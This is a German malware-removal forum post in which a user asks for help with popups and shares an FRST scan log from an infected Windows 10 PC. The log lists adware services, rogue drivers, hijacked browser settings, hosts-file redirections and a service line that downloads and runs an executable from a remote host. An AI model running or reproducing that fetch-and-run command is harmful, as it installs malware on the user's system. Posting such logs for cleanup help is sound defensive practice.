Trojaner-Board
Seite 1 von 6 1 23 Letzte »
100 Beiträge dieses Themas auf einer Seite anzeigen

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Fehlermeldung: WebControl.exe konnte nicht gestartet werden, Millionen von Popups (https://www.trojaner-board.de/182395-fehlermeldung-webcontrol-exe-konnte-gestartet-millionen-popups.html)

RonnyP 17.10.2016 12:58
Fehlermeldung: WebControl.exe konnte nicht gestartet werden, Millionen von Popups
 
Hallo,

mein kleiner Bruder muss irgendwas mit seinem PC (Windows 10) falsch gemacht haben. Jedenfalls bekommt er jetzt immer nach dem start eine Fehlermedlung in der steht "WebControl.exe" konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen richtig eingegeben haben und wiederholen Sie den Vorgang.. Danach öffnet sich immer der Edge Browser mit Window10 Reparatur Seiten. Immer andere.

Habe schonmal FRST geladen und hoffe auf eure Hilfe.
Danke schon mal.

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 16-10-2016
durchgeführt von maikp (Administrator) auf DESKTOP-CHK5R9U (17-10-2016 13:26:51)
Gestartet von C:\Users\maikp\Downloads
Geladene Profile: maikp (Verfügbare Profile: maikp)
Platform: Windows 10 Home Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files\ad11222373fdc03dd874a65a6c6001bc\a080856dd34136605cca635f3f51b1dc.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
() C:\Program Files\Yhid\Veticeq.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\ProgramData\Quoteex\Quoteex.exe
() C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
() C:\Windows\SysWOW64\NetUtils2016.exe
() C:\ProgramData\NetworkPacketManitor\Nettrans.exe
() C:\Program Files\Yhid\Amaak.exe
() C:\Program Files (x86)\WinSaber\WinSaber.exe
() C:\Program Files\Yhid\UketShlo.exe
() C:\ProgramData\Logic Handler\set.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
(Search Module Ltd.) C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
() C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
() C:\Program Files (x86)\WebShield\WebShield.exe
() C:\Program Files (x86)\InterHop\InterHop.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
(Microsoft Corporation) C:\Windows\System32\WpcMon.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
() C:\Program Files\Yhid\Ezolbusp.exe
() C:\Program Files\Yhid\Ezolbusp64.exe
(GM4) C:\Program Files (x86)\mpck\o_network.exe
(GM4) C:\Program Files\SpaceSoundPro\i_network.exe
(GM4) C:\Program Files (x86)\DPower\wemoshow.exe
(GM4) C:\Program Files (x86)\sunnyday\o_network.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Space Sound Pro) C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
() C:\Program Files (x86)\mpck\wincom_VL5.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIPME.EXE
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
(JKJHGF6) C:\Program Files\Caster\wizzcaster.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\Y2Go\bin\pt.exe
() C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\System32\mspaint.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe


==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-27] (Microsoft Corporation)
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [WINCOMVL5] => C:\Program Files (x86)\mpck\wincom_VL5.exe [4284416 2016-10-08] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-11-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NUMPADL] => USBNUMP.exe
HKLM-x32\...\Run: [NUMCHK] => NumpChk.exe
HKLM-x32\...\Run: [AppTrailers] => C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe [47824832 2016-09-29] ()
HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DPower\DiskPower.exe [210432 2016-07-21] ()
HKLM-x32\...\Run: [DailyBee] => C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe [47813592 2016-09-29] ()
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [61648 2016-09-26] (Avira Operations GmbH & Co. KG)
HKLM\...\RunOnce: [OTUTPRODUCT_SCHPE] => C:\Program Files (x86)\mpck\o_network.exe [179200 2016-10-08] (GM4)
HKLM\...\RunOnce: [IDSCPRODUCT] => C:\Program Files\SpaceSoundPro\i_network.exe [181248 2016-10-08] (GM4)
HKLM\...\RunOnce: [OMEWPRODUCT_VO4TE] => C:\Program Files (x86)\DPower\wemoshow.exe [182784 2016-10-08] (GM4)
HKLM\...\RunOnce: [OTUTPRODUCT_ILRIX] => C:\Program Files (x86)\sunnyday\o_network.exe [179200 2016-10-08] (GM4)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIPME.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [WebDiscoverBrowser] => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [985312 2016-05-27] ()
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [Caster] => C:\Program Files\Caster\wizzcaster.exe [240640 2016-10-08] (JKJHGF6)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\MountPoints2: {32d903d3-7d5a-11e6-b073-806e6f6e6963} - "F:\InstallNavi.exe"
HKU\S-1-5-18\...\Run: [] => 0
AppInit_DLLs: C:\ProgramData\Quoteex\Inch-Job.dll => C:\ProgramData\Quoteex\Inch-Job.dll [358912 2016-10-17] ()
AppInit_DLLs-x32: C:\ProgramData\Quoteex\Singlefix.dll => C:\ProgramData\Quoteex\Singlefix.dll [248320 2016-10-17] ()
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
GroupPolicyUsers\S-1-5-21-1190326282-1682839636-2826347982-1002\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [S-1-5-21-1190326282-1682839636-2826347982-1002] => Proxy ist aktiviert.
ProxyServer: [S-1-5-21-1190326282-1682839636-2826347982-1002] => http=127.0.0.1:8808;https=127.0.0.1:8808
Hosts: 0x3130372E3137382E3235352E3838207777772E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E3838207777772E73746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073736C2E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E383820706172746E65722E676F6F676C65616473657276696365732E636F6D0D0A3130372E3137382E3235352E383820676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3234382E313330207374617469632E646F75626C65636C69636B2E6E65740D0A3130372E3137382E3234372E31333020636F6E6E6563742E66616365626F6F6B2E6E65740D0A3130372E3137382E3235352E3838207777772E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E3838207777772E73746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073736C2E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E383820706172746E65722E676F6F676C65616473657276696365732E636F6D0D0A3130372E3137382E3235352E383820676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3234382E313330207374617469632E646F75626C65636C69636B2E6E65740D0A3130372E3137382E3234372E31333020636F6E6E6563742E66616365626F6F6B2E6E65740D0A2320436F707972696768742028632920313939332D32303039204D6963726F736F667420436F72702E0D0A230D0A23205468697320697320612073616D706C6520484F5354532066696C652075736564206279204D6963726F736F6674205443502F495020666F722057696E646F77732E0D0A230D0A2320546869732066696C6520636F6E7461696E7320746865206D617070696E6773206F662049502061646472657373657320746F20686F7374206E616D65732E20456163680D0A2320656E7472792073686F756C64206265206B657074206F6E20616E20696E646976696475616C206C696E652E2054686520495020616464726573732073686F756C640D0A2320626520706C6163656420696E2074686520666972737420636F6C756D6E20666F6C6C6F7765642062792074686520636F72726573706F6E64696E6720686F7374206E616D652E0D0A2320546865204950206164647265737320616E642074686520686F7374206E616D652073686F756C6420626520736570617261746564206279206174206C65617374206F6E650D0A232073706163652E0D0A230D0A23204164646974696F6E616C6C792C20636F6D6D656E747320287375636820617320746865736529206D617920626520696E736572746564206F6E20696E646976696475616C0D0A23206C696E6573206F7220666F6C6C6F77696E6720746865206D616368696E65206E616D652064656E6F7465642062792061202723272073796D626F6C2E0D0A230D0A2320466F72206578616D706C653A0D0A230D0A232020202020203130322E35342E39342E393720202020207268696E6F2E61636D652E636F6D202020202020202020202320736F75726365207365727665720D0A232020202020202033382E32352E36332E31302020202020782E61636D652E636F6D202020202020202020202020202023207820636C69656E7420686F73740D0A0D0A23206C6F63616C686F7374206E616D65207265736F6C7574696F6E2069732068616E646C65642077697468696E20444E5320697473656C662E0D0A23093132372E302E302E31202020202020206C6F63616C686F73740D0A23093A3A31202020202020202020202020206C6F63616C686F73740D0A0D0A3132372E302E302E3120202020202020646F776E2E6261696475323031362E636F6D0D0A0D0A3132372E302E302E31202020202020203132332E736F676F752E636F6D0D0A0D0A3132372E302E302E31202020202020207777772E637A7A73797A676D2E636F6D0D0A0D0A3132372E302E302E31202020202020207777772E637A7A73797A786C2E636F6D0D0A0D0A3132372E302E302E3120202020202020756E696F6E2E6261696475323031392E636F6D0D0A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{3d81cbce-e610-469f-9cca-4c3e693ee4a2}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{61fe218e-84a2-11e6-a5e2-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [NameServer] 188.120.239.115,8.8.8.8
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [DhcpNameServer] 192.168.2.1
ManualProxies: 1http=127.0.0.1:8808;https=127.0.0.1:8808

Internet Explorer:
==================
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYxkvGPup7Mg0M56BkMDSsdML4JBRvebV2qsEBaL_y70m-u5OhTvOG2ZcCHwEFZ0dQJWwB6ROxd_6oJGbn
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.hyrican.de
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {FAD3AE2D-3E11-4E7C-82B8-904BB0EBAD7B} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
BHO: Yhid -> {B1E7C398-824A-4CB9-8D98-DF02E560EA02} -> C:\Program Files\Yhid\Sioar64.dll => Keine Datei
BHO-x32: Yhid -> {B1E7C398-824A-4CB9-8D98-DF02E560EA02} -> C:\Program Files\Yhid\Sioar.dll => Keine Datei

FireFox:
========
FF DefaultProfile: 1nisvqqo.default
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\1nisvqqo.default\Profiles\1nisvqqo.default [nicht gefunden]
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default [2016-10-17]
FF user.js: detected! => C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\user.js [2016-10-09]
FF NewTab: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF Homepage: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF Keyword.URL: Mozilla\Firefox\Profiles\1nisvqqo.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
FF Extension: (goMovix - Movies And More) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\caa1-aDOiCAxFFMOVIX@jetpack.xpi [2016-10-03]
FF Extension: (Adblock Plus) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-10-03]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\cvlj4y2n.xml [2016-10-09]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\smod.xml [2016-10-09]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 ad11222373fdc03dd874a65a6c6001bc; C:\Program Files\ad11222373fdc03dd874a65a6c6001bc\a080856dd34136605cca635f3f51b1dc.exe [18874368 2016-10-06] () [Datei ist nicht signiert] <==== ACHTUNG
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [351944 2015-11-04] (Advanced Micro Devices, Inc.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [350584 2016-09-26] (Avira Operations GmbH & Co. KG)
R2 backlh; C:\ProgramData\Logic Handler\set.exe [3786752 2016-10-07] () [Datei ist nicht signiert]
R2 DqWPLkdO; C:\Program Files (x86)\WebShield\WebShield.exe [360448 2016-10-14] () [Datei ist nicht signiert]
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 InterHop; C:\Program Files (x86)\InterHop\InterHop.exe [159232 2016-10-09] () [Datei ist nicht signiert]
R2 Nettrans; C:\ProgramData\NetworkPacketManitor\Nettrans.exe [57856 2016-09-28] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2016-10-08] ()
R2 Noije; C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe [170496 2016-08-11] () [Datei ist nicht signiert]
R2 ProntSpooler; C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe [134656 2016-05-19] () [Datei ist nicht signiert] <==== ACHTUNG
R2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe [693760 2016-10-08] () [Datei ist nicht signiert]
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2016-10-09] (Search Module Ltd.) [Datei ist nicht signiert]
R2 Uwiseferesy; C:\Program Files (x86)\Ferqesp\cletaspwseMnt.dll [277504 2016-10-08] () [Datei ist nicht signiert]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S2 wdsvc; C:\Program Files\WebDiscoverBrowser\wdsvc2.exe [305376 2016-05-27] (Startup Service)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 winsaber; C:\Program Files (x86)\WinSaber\WinSaber.exe [693976 2016-10-14] ()
R2 A664B55A-D881-48A8-bEA5-02B80DDCA170; "C:\Program Files\Yhid\Veticeq.exe" [X]
S2 Bokvunnu; "C:\Users\maikp\AppData\Roaming\GowvePitpagf\Lurzem.exe" -cms [X]
R2 bugowutu; C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs [X]
S3 CHNGTSvc; c:\exervice.exe hxxp://cloudfront.e3ba815fc687db2682e1c56404cfb4df5f55def6.xyz/download/xpack1014_DE.1476456729.exe [X] <==== ACHTUNG
R2 UketShlo; "C:\Program Files\Yhid\UketShlo.exe" [X]
R2 Yhid Updater; C:\Program Files\Yhid\Amaak.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 850f7be33916569bd078ba09b46b7e7d; C:\WINDOWS\system32\drivers\850f7be33916569bd078ba09b46b7e7d.sys [57424 2016-10-06] (K5ON85) <==== ACHTUNG
R0 amdide64; C:\Windows\System32\drivers\amdide64.sys [11944 2013-03-08] (Advanced Micro Devices Inc.)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [21160 2012-09-23] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
R1 bsdpf64; C:\WINDOWS\system32\Drivers\bsdpf64.sys [27456 2016-10-09] ()
R1 bsdpr64; C:\WINDOWS\system32\Drivers\bsdpr64.sys [26944 2016-10-09] ()
R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [65344 2016-10-09] (Windows (R) Win 7 DDK provider) <==== ACHTUNG
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2016-10-08] () <==== ACHTUNG
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-10-09] ()
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 USBNUMP; C:\Windows\System32\drivers\USBNUMP.sys [13872 2009-08-14] (Windows (R) Codename Longhorn DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
2/3 von FRST

Code:
==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-17 13:26 - 2016-10-17 13:27 - 00023177 _____ C:\Users\maikp\Downloads\FRST.txt
2016-10-17 13:26 - 2016-10-17 13:26 - 00000000 ____D C:\FRST
2016-10-17 13:25 - 2016-10-17 13:25 - 02406912 _____ (Farbar) C:\Users\maikp\Downloads\FRST64.exe
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0125E1E8
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000025484F3DA18
2016-10-17 12:26 - 2016-10-17 12:26 - 00000000 ___HD C:\OneDriveTemp
2016-10-15 14:59 - 2016-10-15 14:59 - 00000000 ___HD C:\$SysReset
2016-10-15 14:53 - 2016-10-15 14:53 - 00001292 _____ C:\Users\Public\Desktop\Avira Connect.lnk
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Package Cache
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\Program Files (x86)\Avira
2016-10-15 14:52 - 2016-10-15 14:52 - 04480896 _____ (Avira Operations GmbH & Co. KG) C:\Users\maikp\Downloads\avira_de_av_580225382c90f__ws.exe
2016-10-14 20:33 - 2016-10-14 20:33 - 00000000 ____D C:\$WINDOWS.~BT
